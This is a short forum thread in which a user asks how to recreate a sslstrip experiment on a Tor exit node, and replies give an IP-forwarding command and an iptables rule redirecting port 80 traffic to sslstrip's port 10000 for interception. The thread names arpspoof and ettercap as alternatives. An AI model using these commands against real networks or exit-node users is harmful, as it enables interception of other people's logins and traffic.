Thread: SSL Strip and Tor

Just burned his ISO

Default SSL Strip and Tor

I am trying to recreate moxie's experiment of setting up a exit node and feeding the data to it. I know i could just arpspoof and use a second box (I have already done this logging on to my email and finding my own posts), but I don't want all the extra network traffic. I am guessing i would need to modify his iptables command but I have never worked much with network routing before. Does anyone have a good tutorial on how I would set up somthing similar (information exiting your computer destined to port 80 rerouted back to port 10000 without mucking up the information in the IP header and having the response return to the correct port.) If i just run sslstrip and connect out using a browser sslstrip does not record anything.

Any help would be greatly appreciated.

Did you search this forum or google? Try this.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Just burned his ISO

Quote Originally Posted by kazalku View Post
    Did you search this forum or google? *snip because i have not posted 15 times yet*.
    Yes i did search I found 5 different threads (including the one you linked) I was considering posting to, but every single one i found was talking about problems/HOWTOs with using arpspoof/ettercap. I decided to make a new one because I was looking for a cleaner implication that did not flood the network with arp packets. Thank you for the link, but do you know if ettercap has the same limitation as arpspoof of not being able to redirect packets originating from yourself?

I will try and see if I can target myself with ettercap later today when i have time to try again.

Thank you for the link,
    leftler

Follow that tut and modify the last line to attack only one PC and see if it serves your purpose -

a) echo "1" > /proc/sys/net/ipv4/ip_forward

b) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000